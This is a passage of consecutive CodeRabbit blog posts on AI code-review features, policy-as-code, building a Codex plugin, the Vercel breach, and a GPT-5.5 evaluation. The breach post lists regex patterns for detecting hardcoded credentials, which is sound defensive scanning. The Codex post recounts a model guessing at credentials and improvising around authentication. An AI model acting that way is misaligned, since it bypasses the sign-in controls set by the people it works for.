observe how people naturally use it, then expand based on real usage patterns. This gives the team time to establish norms, identify high-value workflows, and sharpen any review or approval expectations before the agent becomes part of daily operating rhythm. ## **Build for the team, not the individual** One of the most powerful properties of a Slack-native agent is that Slack is inherently multiplayer. Questions are asked in public. Context accumulates. Decisions need to be visible. Handoffs happen across functions. ![Slack message from Harjot Gill asking about weekly documentation drift guard automation.](https://victorious-bubble-f69a016683.media.strapiapp.com/02_8af0def256.png) The most effective teams use CodeRabbit Agent for Slack in shared channels and threads whenever the work benefits from collective visibility. Bug triage, incident response, release readiness, spec clarification, customer issue investigation, and architectural Q\&A all get sharper when the agent's reasoning is visible to everyone involved. That visibility reduces duplicate work, makes decisions easier to audit, and means the agent's output becomes reusable. That means new team members can read an incident summary later, other functions can reference a technical explanation without asking the same questions again, and engineers stop reconstructing the same context from scratch. ## **Establish channel and thread norms early** Structure turns a powerful agent into a predictable one. Decide early where different classes of requests belong. **Engineering channels** are a natural home for code understanding, PR context, and release questions. **Support channels** work well for customer issue triage because the agent can pull context from your CRM, support tickets, issue trackers, documentation, and past conversations into a single thread. **Incident channels** are where the agent earns some of its highest leverage by assembling timelines, summarizing logs, identifying recent changes, and proposing next debugging steps from the same thread where the alert fired. **Product and planning channels** can use it for issue scoping, roadmap decomposition, or turning a messy conversation into a clean technical plan the team can review before anyone starts coding. Thread discipline matters equally. Keep each request scoped to a thread so that relevant context stays together, the conversation remains easy to follow, and future readers can understand what was asked, what evidence was gathered, and what decision was made. ## **Put CodeRabbit Agent for Slack to work across the full software lifecycle** The highest-leverage usage spans the entire lifecycle of building and operating software. The teams that discover this early pull ahead quickly. ![A dark mode chat conversation discussing user data for an Extension Adoption Dashboard.](https://victorious-bubble-f69a016683.media.strapiapp.com/03_a23f1ab179.png) Before work starts, the agent clarifies requirements, breaks down ambiguous requests, inspects the codebase for likely touchpoints, and surfaces risks that would otherwise emerge much later. During implementation, it helps developers navigate unfamiliar modules, compare approaches, and reproduce customer bugs from tickets. For example, paste an issue into Slack, the agent reproduces it in a browser, and returns a screen recording with filed repro steps. During review and release, it summarizes what changed, identifies likely regressions, and generates changelogs grouped by features, fixes, and improvements. After release, it supports incident response, root-cause exploration, and keeps documentation in sync with what was actually shipped. ## **Set clear expectations around human review** The place to establish where human judgment stays in the loop is before the agent starts opening pull requests, drafting operational recommendations, and interacting with production systems. Anything that mutates production systems, changes critical code, or creates external-facing commitments warrants human approval before it moves forward. This is how mature teams hold velocity and control at the same time. The healthiest model is calibrated trust. Let the agent gather context quickly, compress large amounts of information, propose concrete next steps, and execute across the tools the team already uses. All the while, humans own the judgment calls, prioritization, and final approval where it counts. ## **Launch with real use cases, build from there** Teams adopt tools because the tool solved a problem they felt this week, and the best rollouts lean into that scenario. Introduce CodeRabbit Agent for Slack through a handful of concrete workflows that matter immediately. This may include production issue investigation, support escalation triage, codebase questions, PR understanding, release summaries, or technical onboarding. Pick the ones that are common, expensive, and easy to recognize. Once people see the agent reduce time-to-answer or take real work off a teammate's plate, adoption takes care of itself. And bring the whole organization along. Product managers use it to understand implementation implications before filing work. Support teams use it to gather technical context before escalating. Engineering managers use it to summarize changes and understand blockers. Incident managers use it to speed up context assembly during active response. The agent becomes most valuable when the entire delivery organization operates more coherently around the same systems and the same work. That is where the real leverage lives. Ask it for one-off answers and you capture a fraction of CodeRabbit Agent for Slack value. Instead, weave it into the collaborative fabric of how work gets understood, advanced, reviewed, and completed. That’s how the whole organization moves faster.

Policy-as-code: The missing layer in AI-assisted development

David Kravets — Tue, 05 May 2026 00:00:00 GMT

Engineering teams have standards. The problem is that many of those standards still live in wikis, onboarding docs, architecture pages, and reviewer memory. Somewhere, there is guidance on how services should communicate, what tests should accompany a risky change, which dependencies are acceptable, and what good pull requests look like. Senior engineers know the patterns. Experienced reviewers can usually tell when something feels off. Newer team members learn the rules by absorbing comments, examples, and a fair amount of folklore. For a long time, teams could get by with that. It was imperfect, but workable. As code production shifts from manual to generated, the cost of staying there compounds quietly. Standards erode faster than anyone updates the wiki. Review comments relitigate the same decisions quarter after quarter. The gap between what the architecture diagram says and what the codebase actually does grows wider with every sprint. Standards must move from tribal knowledge to enforceable guardrails, and the window to make that shift is closing faster than most teams realize. ## The disease, not just the symptom Consider a familiar pull request: a team adds a direct read from the billing database to power a support workflow more quickly. The code passes tests. The feature works. One reviewer sees a pragmatic shortcut. Another sees an architecture violation. A third never notices the boundary issue at all. If the team's standard is "use approved service interfaces instead of reaching across domains directly," but that standard only exists as prose and memory, then enforcement becomes a matter of who happens to review the change that day. That has always been a problem. What has changed is the scale. Every engineer now runs a private coding agent, on their own machine, in sessions nobody else can see. The agent starts each morning knowing nothing. Whatever reasoning was assembled yesterday, whatever alternatives were weighed, whatever decisions were made in standups — gone. The developer's first task every morning is to reconstruct context that already exists somewhere in the organization and paste it into a window that resets at the end of their day. The result is faster drift, not just faster code. Human teams lose coordination over weeks. AI teammates lose it within a single workday, and the industry calls it high productivity. A lot of what organizations call "engineering standards" are good intentions, nothing more. Only as durable as the reviewer who remembers them, and now only as durable as the context a developer remembered to paste into an agent session that morning. ## The wrong intervention The instinct is to fix this at the pull request level, to catch violations at the gate, add more review steps and write better templates. That is fighting the problem at the wrong end. Enforcement at the PR stage catches violations after the fact. The better intervention is making sure the agent understands the rules before writing a single line. Give an agent a codebase with no context and the output is plausible-looking code that misses every convention the team spent two years establishing. Give the same agent the codebase plus architectural decisions, ticket history, on-call runbooks, and the Slack thread where the team decided to deprecate the old auth service, and the output looks like a teammate wrote it. Right now, developers manually assemble that context every single session, acting as interpreters between their own engineering org and a tool that should already know. That is the gap. Not the model. Not the PR template. The missing layer is a durable, shared context that governs what the agent knows before work begins. Many teams reach for a shared wiki or a project-level file the agent ingests at the start of each session. It is better than nothing, but not by as much as it seems. Documentation is a photograph of what the team knew at the moment someone sat down to write it. In an engineering organization moving fast, that moment recedes quickly, and what fills the gap between the last update and today is exactly the context that matters most and gets captured least. ## What solving it looks like [CodeRabbit Agent for Slack](https://www.coderabbit.ai/agent) is built around that premise. Rather than a per-developer, per-session tool that starts cold, it brings the agent into the place where the team already coordinates, covering the core loop of planning, code generation, review, and investigation, with context that persists and compounds across sessions. Every code review, resolved ticket, and architectural discussion feeds a shared knowledge layer so the agent arriving at a new task already understands the conventions, the deprecations, and the decisions that never made it into a doc. Work is visible, commentable, and resumable by anyone on the team, rather than trapped in one engineer's browser tab or wiped when they close a terminal. That shared foundation is what makes policy enforceable rather than merely aspirational. Structure, however, still matters. ## From beliefs to a policy stack Longer documents are not the answer. What teams need is a lightweight policy stack. Principles explain the intent. Rules define the expected behavior. Automated checks verify the repeatable parts. Escalation paths handle ambiguity and exceptions. Each layer matters. Principles keep teams from enforcing rules mechanically without understanding why they exist. Rules make principles concrete enough to apply. Automated checks reduce the burden on reviewers by catching the obvious and repeatable cases. Escalation preserves room for judgment when the situation is genuinely unusual. Drop one of those layers and the system weakens. ## What this looks like in practice Take architectural boundaries. A principle like "preserve clear ownership and service boundaries" is useful but too abstract to guide review consistently. Turn it into rules: services must access another domain through the published API, not the backing datastore; new imports from restricted internal modules are prohibited; cross-domain write paths require approval from designated owners; shared libraries must not absorb business logic that belongs to one service. ![Dark mode UI for project creation, showing fields for name, URL, build steps, and settings.](https://victorious-bubble-f69a016683.media.strapiapp.com/Screenshot_2026_05_05_at_16_36_13_1d5908ca30.png) Now the standard is operational. Some parts can be checked automatically. A bot can detect prohibited imports. CI can flag new dependency edges. A review agent can notice that a pull request touches a sensitive path and request additional reviewers. The rest goes to escalation: if a team has to bypass the policy temporarily, the pull request should say so plainly, stating what rule is being bypassed, why, who approved it, and when the exception will be revisited. The same pattern applies to dependency hygiene. “Minimize dependency risk” becomes useful when turned into rules. New runtime dependencies must justify their presence. Packages must show active maintenance, and anything that duplicates existing capability must explain why. Tooling can support those rules. But a PR structure that makes the decision visible and consistently evaluated is what gives them teeth. There is a simple test every team should run against its architectural intent. Could a new reviewer apply this consistently? Could a tool verify at least part of it? If the answer to both is no, rewrite the standard. ## Exceptions are necessary. Hidden exceptions are corrosive. One reason teams resist more explicit policy is fear of rigidity. That concern is understandable. Emergencies happen. Migrations create awkward tradeoffs. Platform limitations force temporary compromises. Unmanaged exceptions are exactly how standards erode. A healthy exception process makes the bypass visible and meaningful without turning it into an empty ceremony. The best ones are explicit, justified, approved, and time-bound. They leave a trace. That trace matters. If the same exception keeps appearing, the standard may be poorly designed, the platform may be missing a capability, or the architecture may have drifted from reality. Exceptions should not just be tolerated. They should teach something. Without that loop, teams create policy theater: rules everyone treats as firm in principle, exceptions everyone handles informally in practice, and review processes that signal rigor without reliably producing it. ## The control surface has changed Code review used to be primarily a social mechanism: collaboration, mentorship, style feedback, and a little quality control. That model is no longer sufficient. The pull request is now a primary control surface for engineering quality, architectural consistency, and risk management. The moment when the organization decides what enters production and under what conditions. But one point in a much longer chain. Individual productivity from coding agents is up across every team adopting AI. Team-level productivity is stuck, because there is no shared record of what the agent actually did, no visibility into what systems it touched, and the agent does not live where engineering actually happens. Solve those, and team productivity starts to compound the way individual productivity already has. The agents that win will be the ones that already know your systems when you open them: the conventions, the deprecations, the decisions that never made it into a doc. Policy-as-code is how you give them that foundation. That is the bet behind CodeRabbit Agent for Slack: an agent that carries your team's institutional memory into every session, governs work in the open where teammates can see it, and compounds knowledge rather than resetting it. Planning, generation, review, and investigation, all in the place where your team already works, with your standards already loaded. If a standard cannot shape what the agent builds, it is a suggestion. Nothing more.

Be honest about that "I'll clean it up later" comment

Konrad Sopala — Mon, 04 May 2026 00:00:00 GMT

You finished the feature, tests passed, PR's up. There is one function that is doing too much. That conditional could be tighter and there's a duplicate block that's begging to be a helper. The thing is, it's 5pm. You've got standup notes to write and two PRs to review. The cleanup gets a `TODO` and a quiet promise to come back to it. You know how that ends. Always. ## Meet Simplify Code [Simplify Code](https://docs.coderabbit.ai/finishing-touches/simplify) reviews the files you changed in a PR and applies targeted improvements \- extracting reusable functions, simplifying conditionals, removing redundant code and so on, without changing behavior. One comment and the cleanup pass actually happens. %[https://youtu.be/rUIWSQN-xLQ] ## How it works You can either **comment** *@coderabbitai simplify* in the pull request thread or check the **Simplify code** box in the CodeRabbit walkthrough comment. ## What happens when you trigger it Here's what that looks like: * **Sandbox clone:** CodeRabbit clones your repo into a sandbox and diffs the PR branch against the base to identify every changed file. * **Targeted edits:** an AI agent reads each changed file and applies focused improvements: extracting helpers, collapsing redundant logic, tightening conditionals (behavior stays the same) * **Verification:** the agent runs your existing test suite to confirm nothing broke. * **Delivery:** open a new PR with the simplified code or commit it directly to your existing branch. The whole process can take up to 20 minutes depending on PR size. ## What Simplify Code won't touch While it stays in the cleanup lane, it won't: * Change public APIs or rename exported symbols * Alter test assertions * Refactor code outside the files changed in your PR If your test suite fails after the changes, it still delivers them so you can inspect, fix or discard. ## Try it out CodeRabbit’s Simplify Code feature is available on the Pro+ plan, on GitHub. Next time you ship a PR and feel the itch to come back and clean it up, don't bookmark it. Drop a comment. [**Get started with CodeRabbit**](https://coderabbit.link/Q5oy5FI)

Introducing Resolve Merge Conflicts

Konrad Sopala — Thu, 30 Apr 2026 00:00:00 GMT

You're about to merge. Everything's green. Then GitHub hits you with: *"This branch has conflicts that must be resolved."* Here’s what you do next: * Pull main * Switch branches * Open the conflicting files * Try to remember what the other dev was even doing in this code * Mash some lines together, hoping nothing breaks * Push and pray for the CI The conflict markers are noise around code that wasn't really fighting in the first place. So why are you still stuck in the weeds for this? ## Meet Resolve Merge Conflicts %[https://youtu.be/VdvnzdafLp0?si=gglnblGB-r3c5je5] When CodeRabbit detects conflicts in your PR, [Resolve Merge Conflicts](https://docs.coderabbit.ai/finishing-touches/resolve-merge-conflict) can fix them for you \- reading the intent behind both sides, figuring out the right unified outcome, and committing it as a proper merge commit on your branch. It’s available on both GitHub and GitLab on the CodeRabbit Pro Plus plan. Here’s what that looks like. ### Manual old way The way it probably used to work for you before is that you stopped what you're doing, switched branches and manually reconciled someone else's changes with yours. After all that, you re-ran CI and hoped you didn't miss anything subtle. ### The new way with one comment You comment, CodeRabbit resolves and the merge commit lands on your branch with both parents intact. ## How it works There are two ways to use this feature. ### Comment in the PR In the PR thread just comment ![A dark terminal window showing the command '@coderabbitai resolve merge conflict' with window control dots.](https://victorious-bubble-f69a016683.media.strapiapp.com/carbon_1_161e79fc57.png) ### Checkbox in the PR walkthrough On GitHub, when CodeRabbit detects conflicts during review, it adds a Resolve merge conflicts checkbox right inside the walkthrough comment — just tick it. Both routes commit the resolved changes directly to your branch. ## What happens when you trigger it? When resolution runs, here's what's happening under the hood: * **Detection:** during PR review, CodeRabbit simulates the merge in a sandbox and lists any conflicts in the summary comment. Your working tree stays untouched. * **Intent analysis:** for each conflicting file, the agent reads both branches and works out *why* each side made the changes it did, not just *what* changed. * **Resolution:** an AI agent reasons through each conflict from first principles. It works directly inside the repo, inspecting git state, reading files, running git commands, editing code. It can make changes beyond the conflict hunks if the right outcome requires it. * **Validation:** it checks that no conflict markers remain, that the merge index is clean and runs your repo's build and lint to surface any errors introduced by the resolution. * **Commit:** the result lands as a proper merge commit with two parents (your branch and the base branch), so your git history reflects what actually happened. ## When it’s extremely useful Remember the last time you were on GitHub and a pull request had conflicts that were too complex for the web editor to resolve? With the Resolve **Merge Conflicts** feature, you will no longer be stopped by the error message: *use the command line to resolve conflicts before continuing*. ## When CodeRabbit won't auto-resolve The agent will decline a resolution rather than guess if doing so could cause real harm in two cases: * **Security-critical code:** Auth logic, encryption, secrets handling, access control. Wrong calls here are too costly to gamble on. * **Fundamentally incompatible business logic:** Where both sides made architectural decisions that contradict each other and a human needs to weigh in. When it declines, the entire attempt is aborted so there are no partial commits or half-resolved files. You get a comment naming the file and the specific reason. The bar for declining is intentionally high, so the vast majority of conflicts get resolved automatically. ## **Try it out** Resolve Merge Conflicts is in open beta on the Pro Plus plan, available on GitHub and GitLab. Next time you have a conflict, don't switch branches. Drop a comment in the PR and watch your merge conflicts disappear. [Get started with CodeRabbit](https://coderabbit.link/Q5oy5FI)

How we built the CodeRabbit plugin for Codex

Juan Pablo Flores — Tue, 28 Apr 2026 00:00:00 GMT

When we started working on the [CodeRabbit plugin for Codex](https://www.coderabbit.ai/blog/coderabbit-plugin-for-codex), the goal was not to package as many features as possible. It was to make one workflow feel natural. A developer asks for review, the agent handles setup and execution, and the feedback comes back inside the same working session. We wanted that experience to live inside the surfaces where developers are already coding, so review becomes something they reach for in the moment rather than a separate step they have to context switch into. Getting there required more than writing a short set of instructions. We had to decide what belonged in the plugin, how much of the workflow the agent should own, and how explicit we needed to be about model behavior for the experience to stay reliable. ![Flowchart showing Before and After code review workflows, from external steps to inline feedback.](https://victorious-bubble-f69a016683.media.strapiapp.com/context_switch_vs_seamless_6b136968fe.svg) ## **Start with the workflow** We started with the user outcome, not the package structure. The question was straightforward: what should become easier once the plugin is installed? For us, the answer was that code review should feel like part of the coding flow itself. A developer should be able to ask Codex to review the current changes, or use `@coderabbit` to invoke the plugin directly, and get a useful result without manually checking setup, switching tools, or reconstructing the right review command. That workflow gave us the shape of the plugin. Instead of designing around a long list of capabilities, we designed around a narrow job to be done and then asked what the agent needed to do that job well. The more of that loop we could keep inside the place where developers were already coding, the more we could reduce context switching, shorten review cycles, and make code changes cheaper to apply. ## **Build with focused skills** From there, we built focused skills around the core review experience. The code review skill does the heavy lifting. It verifies that the C[odeRabbit CLI](https://coderabbit.ai/cli) is available, checks authentication, chooses the right review target, runs the review, and summarizes findings by severity. Splitting the workflow into focused skills was an important design choice. One giant instruction file might seem simpler at first, but it quickly becomes harder to maintain and harder for the model to use consistently. Focused skills keep the behavior clearer, make iteration easier, and give us a cleaner way to add new workflows over time. ![A diagram comparing a single large instruction file to a modular plugin approach with focused skills.](https://victorious-bubble-f69a016683.media.strapiapp.com/monolith_vs_focused_skills_ba3076e9f1.svg) **The plugin system's core advantage is that it lets you compile skills, MCP servers, and connectors into a single installable unit.** For teams building developer tools or services, that is a meaningful improvement to the experience of the people consuming your work inside the Codex app. Instead of asking users to discover, install, and remember the name of each individual skill, you can ship everything together in one plugin. The model then decides when to bring each skill into the conversation where it provides the most value. **That reduces cognitive load for developers and makes the whole experience feel more intentional.** As we add new [CodeRabbit skills for Codex](https://docs.coderabbit.ai/cli/codex-integration), users get them through the plugin instead of returning to install one skill at a time. A good plugin does not have to be large. It has to make one important workflow easier, then create a clean path to expand from there. ## **Design for real model behavior** The most important part of the work was not the packaging itself. It was learning how to write skill instructions that guide the model toward the behavior you actually want. Every plugin builder will go through a version of this process, so here are the lessons that made the biggest difference for us. **Be explicit about tool choice.** Models are resourceful, and that resourcefulness can work against you if the skill does not set clear boundaries. Early on, we noticed Codex reaching for Python when the workflow only needed a direct CLI command. It would wrap CodeRabbit in a script, add layers around simple terminal actions, or introduce setup steps that were not needed. Once we made the skill instructions specific, telling the model to run `coderabbit` directly as a bare shell command and not to use Python wrappers, the behavior became consistent. The lesson: if your plugin depends on a particular tool, say so clearly and close the door on alternatives the model might improvise. **Handle authentication as a first class concern.** When the CodeRabbit CLI was not yet authenticated, the model would try to solve that on its own rather than following the guided path we had built. It might skip the auth step, guess at credentials, or improvise a workaround that looked reasonable but did not actually sign the user in. We initially tried using the authentication flags that the Codex team provides in their documentation, but in our experience and from the developers testing it, we did not see meaningful changes in behavior when we implemented them. It is possible we configured something incorrectly, but the approach that actually made the difference was handling it ourselves in the skill: check authentication status early and, when the user is not signed in, fall back to a step by step flow that walks them through setup. That one change eliminated most of the unpredictable behavior we were seeing on first runs. ![Flowchart illustrating a review process with authentication, setup flow, and summarization of findings.](https://victorious-bubble-f69a016683.media.strapiapp.com/auth_first_flow_260edec32a.svg) **Set expectations for long running tasks.** CodeRabbit can take time to analyze a larger set of files, and without guidance the model can interpret that delay as a sign something has stalled. We saw it stop early, retry too quickly, or move into a fallback path before the review had actually finished. The fix was to be explicit about patience in the skill: let the review run, wait through the full timeout window, and only narrow the scope after a genuine timeout rather than treating normal latency as a failure. If your tool has operations that take more than a few seconds, building that expectation into the skill makes a real difference. **Guide communication style.** During long tasks, the model tends to narrate every step, repeat that it is still waiting, and send updates that add more noise than reassurance. Users want to know the plugin is working, but they do not want a stream of status messages competing for their attention. We addressed this by telling the model to stay quiet during reviews and only speak when user input is needed, the review is complete, or an error requires attention. The result was a calmer, more professional experience that users consistently preferred. **Design for both the app and the CLI.** We initially built the plugin for the Codex app, and when we moved to testing it in the CLI we noticed different patterns emerging. One of the major benefits of the Codex app is its ability to render UI directly. Codex can display markdown, tables, and richer formatting that makes review findings easy to scan. But the CLI does not render tables or more complex UI components the same way, and what looked clean in the app became harder to read in the terminal. We had to go back to simpler primitives to make sure the output worked well in both environments. If you are building a plugin that will run across the Codex app and the CLI, it is worth testing both early and designing your output around the more constrained surface first. ## **What we would recommend to other builders** If you are building your own Codex plugin, start with the user outcome and work backward from there. Ask what should become easier once the plugin is installed, then define the smallest set of skills that supports that outcome well. The lessons above on tool choice, authentication, patience, and communication style all came from that same process of working backward from the experience we wanted and then writing the skill instructions to get there. **The Codex app includes a create plugin skill** that can help you scaffold the structure and get everything set up. It is a useful way to get moving without assembling the pieces from scratch, and it gives you a working starting point that you can iterate on as you learn how the model responds to your specific workflow. The technical integration is only one layer of the work. The deeper design challenge is deciding what the model should do by default so the experience feels intentional from the first run. ## **What comes next for CodeRabbit Codex plugin** This first version gives us a base to keep expanding the CodeRabbit experience in Codex. We plan to keep improving how review feedback flows back into the agent, add new skills over time, and continue tightening the first run experience so users reach value faster. One of the ideas the team is most excited about is exploring how to use not only the context of the code itself but also the conversation context that Codex provides through the messages a developer has exchanged during the session. That history carries a lot of signal about the intention behind a set of changes, and feeding that into the review could help CodeRabbit deliver feedback that is more aligned with what the developer is actually trying to accomplish rather than reviewing the code in isolation. If you want to try the plugin, head to the announcement post for installation steps. If you are building your own, we would love to see what you create. Share it with us in the [CodeRabbit subreddit](https://www.reddit.com/r/coderabbit/) or the [CodeRabbit Discord](https://discord.com/invite/coderabbit).

Introducing Global Overrides

Konrad Sopala — Mon, 27 Apr 2026 00:00:00 GMT

You roll out a new review policy. Maybe it's a required path instruction for every SQL file. Maybe it's a stricter review profile for anything touching auth. You document it, send the Slack message and slot it into onboarding. Three months later you go look: Half the repos have it, a quarter have their own version and the rest quietly opted out by tweaking their `.coderabbit.yaml`. Every admin has lived this. Config drift isn't a bug, it's what happens when dozens of teams own their own config files. ## Meet Global Overrides [Global Overrides](https://docs.coderabbit.ai/guides/configuration-overview?#global-overrides) let org admins enforce configuration settings across every repository and every PR review in the organization \- regardless of what individual repos have in their `.coderabbit.yaml`, their repo-level UI settings or anywhere else. ## How to set it up 1. Open **Organization Settings** in the CodeRabbit UI 2. In the mode switcher at the bottom left of the sidebar, pick **Global Overrides** 3. Write YAML using the same schema as `.coderabbit.yaml` \- only include the keys you want to enforce 4. Save That's it. The overrides take effect on the next PR review across every repo in the org. %[https://youtu.be/HG6hgv3Da-Q] One small thing worth flagging: Unlike the YAML Editor, the Global Overrides page shows all settings defined \- including default values \- so you can see exactly what's being enforced at a glance. ## What happens when the override meets an existing config Three things, depending on the type: * **Objects** get deep-merged. Override properties replace matching properties at each nesting level. * **Arrays** get merged by key. Override entries take priority when keys match (e.g., `path` in `path_instructions`) and unique entries from other sources are kept. * **Scalars** get simply overridden. Arrays are worth a closer look because they're the trickiest of the three. Global Overrides uses the same key-based merge as [configuration inheritance](https://docs.coderabbit.ai/configuration/configuration-inheritance) \- override entries win when keys match, and any unique entries a repo has stick around. That means you can't wipe a repo's array clean just by defining a shorter one in the override; if you want to replace an entry, your override has to match its key. ## Who can actually use this Only organization admins can view or edit Global Overrides. That's the whole point \- this is an enforcement mechanism, not a shared-defaults mechanism. If you want shared defaults that repos can customize on top of, use [central configuration](https://docs.coderabbit.ai/configuration/central-configuration) instead. ## When to reach for it (and when not to) Global Overrides are built for policies that have to apply everywhere, every time. Think: - Compliance-driven review profiles - Mandatory path instructions for sensitive code (SQL, auth, payments) - Required checks that can't be turned off - Security rules the org needs to guarantee apply everywhere They're not meant for general defaults. If a setting is something repos should usually have but occasionally deviate from, put it in organization settings or central configuration. Save Global Overrides for the things that must apply, always, everywhere. ## Try it out If you're an org admin, head to **Organization Settings \- Global Overrides** and set the policies you've been trying to enforce for months. It takes a minute. The next PR review picks it up. ## [Get started with CodeRabbit](https://coderabbit.link/Q5oy5FI)

What the Vercel breach means for enterprise code security

Sehtej Khehra — Fri, 24 Apr 2026 00:00:00 GMT

Just days ago, Vercel, a widely used cloud platform for deploying web applications, [disclosed](https://vercel.com/kb/bulletin/vercel-april-2026-security-incident) a breach that began months earlier. It started in a roundabout way, when a Context.ai employee unwittingly installed a Lumma Stealer disguised as a Roblox script. A Vercel employee, using Context.ai, then unwittingly got caught up in this trap. The attackers harvested the Vercel employee’s Google Workspace credentials via stolen OAuth tokens, then moved laterally and breached Vercel's internal systems. This exposed API keys, tokens, database credentials, signing keys, and more. In response, Vercel advised customers to rotate any environment variable not marked "sensitive" and to treat those values as compromised. The inevitable post-mortems of this hack will focus on OAuth governance and third-party SaaS risk. Those angles are valid, but they miss the point for security leaders responsible for the code itself: *This was a developer supply chain attack, and the stolen assets prove it.* ## **What the Vercel breach taught us, and how CodeRabbit is built to address it** Our customers trust us with their most valuable asset, their source code. That trust is why security isn't an afterthought. It's a CodeRabbit design principle. ### **Lesson 1: Every tool that touches your code is part of the attack surface** The right question isn't whether a component in your developer stack gets breached. The better question is, what's the maximum damage an attacker can do from that point? ![CodeRabbit Architecture diagram detailing Handler, Reviewer, Database, Scanner, Token Service, and Audit Vault components.](https://victorious-bubble-f69a016683.media.strapiapp.com/security_posture_cr_627a56ab15.png) We built the CodeRabbit code-review platform around that question. Every code review runs in an isolated, ephemeral sandbox and is provisioned per event and destroyed after completion. Each sandbox holds a single, short-lived token scoped only to the repository under review. There’s no shared state between customers. There are no long-lived credentials. There’s no access to internal networks. Sandboxes can reach the public internet when tools require it, but cannot reach CodeRabbit's internal services. Stored code is encrypted with per-customer keys, inaccessible even to CodeRabbit employees. The result is this: If a sandbox is compromised, there's nothing to pivot to. There’s no persistent tokens, and no lateral movement paths. *If one of your sandboxes or workers is breached tomorrow, what's the worst-case outcome?* Every enterprise should ask this of every vendor in their developer stack. ### **Lesson 2: Long-lived secrets in code are a major risk** Many Vercel customers had to rotate keys they didn't know were exposed because the most damaging credentials are often the ones teams forget exist, buried in environment variables or hardcoded directly in source files. Code review is the last practical checkpoint before a secret becomes permanent. Once a credential is committed to a Git repository, it can't be fully scrubbed. Copies persist in forks, caches, CI logs, and developer machines. The only reliable defense is catching it at the pull request. CodeRabbit flags hardcoded credentials through a combination of pattern matching and AI-powered contextual analysis that understands data flow. Pattern matching catches formats like `sk_live_*`, `AKIA[A-Z0-9]{16}`, `ghp_[a-zA-Z0-9]{36}`, and variables named `*_SECRET`, `*_KEY`, or `*_PASSWORD`. We also integrate tools like Semgrep, Checkov, Brakeman, and Betterleaks, with one-click fixes surfaced directly in the pull request. Security teams can define custom checks in natural language via `.coderabbit.yaml` and enforce them as pre-merge gates. Examples include blocking files that hardcode database DSNs or flagging OAuth scopes broader than `read:user`. Vercel has since updated its platform so new environment variables default to sensitive. That's a step in the right direction, but it only covers secrets that make it into environment variables. It doesn't catch credentials hardcoded in source files, feature branches, comments, or config files. The more robust approach: treat every credential as sensitive by default, and enforce that at the code review layer before it ever reaches production. ### **Lesson 3: Identity and access controls must extend to the code review layer** At its core, the Vercel breach was an identity breach. An OAuth token issued to a third-party app became an attacker's access path. Every tool with OAuth access in your workspace, every CI service running on long-lived GitHub tokens, every AI assistant with read access to a monorepo, each of those is a potential entry point. Your code review platform deserves the same identity rigor you apply to your identity provider. For [CodeRabbit Enterprise](https://coderabbit.ai/enterprise), that includes: * SSO and SAML support across major identity providers, with enforcement rather than optional bypass * Custom RBAC to enforce the principle of least privilege * Audit logging for all platform actions and administrative changes * Self-hosted deployment options for organizations that require code to remain within their network perimeter * Support for multi-organization structures, including subsidiaries and M\&A scenarios * SOC 2 Type II compliance, validated annually through independent audit * Zero data retention after review completion, with all code disposed of once the review ends * Vendor security reviews as a standard part of procurement *The goal is straightforward. Even if something upstream is breached, your code review tool should never be the next entry point in the attack chain.* ## **Questions enterprise security teams should ask vendors selling developer tools** The Vercel breach is a reminder to reassess every tool that touches your codebase. Ask these questions of any vendor with access to your source code, including us: 1. **Sandbox isolation:** Is it per-event, per-customer, or shared? What's the worst-case outcome if one sandbox is compromised? 2. **Token scope and lifetime:** Are tokens short-lived and repo-scoped, or long-lived service credentials? 3. **Encryption at rest:** Is code encrypted with per-customer keys? Can your own employees read stored customer code? 4. **Data retention:** Is code disposed of after review, or cached indefinitely? 5. **Self-hosted option:** Can organizations that can't send source code to an external SaaS deploy on their own infrastructure? 6. **SOC 2 and pen testing:** When was your last third-party security assessment, and is the report available under NDA? 7. **Vulnerability Disclosure Program:** Do you have one, and how have you responded when a researcher reported a finding? 8. **Sub-processors:** What third parties handle your data, is the list public, and how much notice do you give before adding a new one? 9. **Identity controls:** Do you offer SSO enforcement, SAML, SCIM, RBAC, and audit log export to a SIEM? 10. **Breach response:** How will you notify customers, how quickly, and what will you disclose? CodeRabbit's answers are detailed in our [full security architecture](https://www.coderabbit.ai/blog/our-security-posture-how-we-safeguard-your-repositories), and in our [Trust Center.](https://trust.coderabbit.ai/) Our team is also happy to answer any questions. ## **At CodeRabbit, security is our top priority** Supply chain attacks don't start at the primary target. They start at the weakest link. Every vendor in your developer workflow, every tool with a token, an OAuth grant, or read access to your code is a potential entry point. The Vercel breach didn't begin at Vercel. It began with a Roblox script. Demand answers. Every vendor you trust with your source code should be able to tell you exactly what happens if they're the next Vercel.

What changed in OpenAI GPT-5.5: Better judgment, stronger coding, better signal

Juan Pablo Flores — Thu, 23 Apr 2026 00:00:00 GMT

*Our early testing shows the model communicates more directly, finds higher-signal issues, and performs better in practical coding and review workflows.* *Note*: During release, you can try GPT-5.5 in ChatGPT and Codex. Using GPT-5.5 felt different in a fairly specific way: it was quicker, leaner, and more direct. In practice, that meant shorter responses, more selective review behavior, and a stronger bias toward small workable changes instead of broad rewrites. This is most relevant for teams using CodeRabbit, building agent workflows, or asking the model to make real changes in codebases. The model responded quickly, communicated with less overhead, and moved toward practical answers without much wasted motion. Part of that speed was also visible in how quickly it surfaced user-facing progress instead of waiting to finish all of its internal work before responding. That directness carried over into the quality of the output. Across code review, bug-fixing, and debugging tasks, the model consistently leaned toward scoped changes, preserved behavior more often, and usually focused on the actual failure mode rather than drifting into speculative redesign. ## **GPT-5.5 code review performance** One of the clearest strengths in our testing was code review. In the stronger examples, the model focused on bugs that were concrete, actionable, and worth interrupting a developer's flow. It showed up clearly in debugging-oriented reviews. When the task involved access control, error handling, or API behavior, the model was often able to isolate the actual regression, reject a weak diagnosis, and point toward a fix that preserved the intended behavior. The benchmark results align with this observation. The "baseline" mentioned in the subsequent diagram and text does not refer to a single comparison model. Instead, it signifies CodeRabbit's current live review system, which employs a combination of various models rather than relying on just one. In our early testing with GPT-5.5, the agent reached 79.2% expected issue found on our curated review benchmark versus 58.3%, improved precision from 27.9% to 40.6%, and produced 75 comments versus the baseline's 67\. That means it found substantially more useful issues with only a modest increase in comment volume. In testing, GPT-5.5 improved performance across several key metrics on our large-scale, real-world review set. Specifically, the expected issue found rate increased from a 55.0% baseline to 65.0%. Furthermore, precision improved from 11.6% to 13.2%. The agent also became more verbose, generating 722 comments compared to 558 with the previous baseline. The practical takeaway is that GPT 5.5 outperformed the baseline on signal quality, even though its review volume was not uniformly lower than baseline. ![Bar charts comparing GPT 3.5 and a production baseline for review signal quality metrics.](https://victorious-bubble-f69a016683.media.strapiapp.com/image2_feae90543a.png) Part of that behavior appears to come 